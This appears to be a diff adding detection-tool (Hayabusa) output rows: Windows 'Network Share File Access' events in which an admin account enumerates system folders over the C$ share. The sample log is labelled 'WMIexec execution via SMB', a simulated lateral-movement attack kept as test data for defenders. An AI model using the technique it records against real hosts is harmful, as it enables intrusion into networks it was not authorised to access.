+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
